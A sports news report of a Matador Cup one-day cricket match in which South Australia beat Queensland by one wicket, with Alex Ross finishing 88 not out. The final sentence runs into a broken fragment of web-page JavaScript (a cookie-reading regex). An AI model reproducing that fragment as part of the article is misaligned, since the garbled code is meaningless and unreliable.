The Redbacks have beaten Queensland by one wicket in a thrilling comeback, thanks to a stunning finish from batsman Alex Ross.

Queensland batted first, scoring 9-279 off their 50 overs.

However, the Bulls competitive total looked inconceivable early in the innings, with Kane Richardson taking two Queensland wickets with the first two balls of the innings.

With Queensland at 2-0, Nathan Reardon joined Chris Hartley at the crease and rescued the innings, sharing a 168 run third wicket partnership, before Reardon was dismissed for 87. Hartley then followed soon after for 79 to make it 4-197 with 12 overs remaining.

Quick fires scores from Cutting (28 from 28), Hopes (18 from 13), Boyce (13 from 10) and Steketee (15 from 13) at the death propelled Queensland to a score of 9-279. Richrdson finished with figures of 5-35 from his 10 overs.

South Australia also lost quick wickets in reply with a top order collapse to be 3-48 after 14 overs and then 4-70 after 19 overs.

Callum Ferguson then followed up his century on day one of the tournament, to make an important 58 form 78 balls to help steady his side.

However, when Ferguson was dismissed, the Redbacks were in trouble at 5-132 and they required over eight an over to win.

Alex Ross and Adam Zampa then continued to rebuild the innings, with Zampa making a stunning 61 from just 38 balls, before lobbing a catch to backward point.

A 10 minute rain delay at 6-219 in the 44th over reduced the innings to 49 overs and reduced the target from 280 to 275.

Alex Ross, unbeaten on 51, held the key to victory for the Redbacks, with just the tail to come and he produced a scintillating batting display, shielding the tail, before unleashing three fours and a six in the final over of the match to reach the target with one ball to spare.

Ross finished not out on 88 from 87 balls, with South Australia reaching 9-278 to complete the win.

Queensland has now lost two of its opening three Matador Cup matches, while South Australia has won two and lost one. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
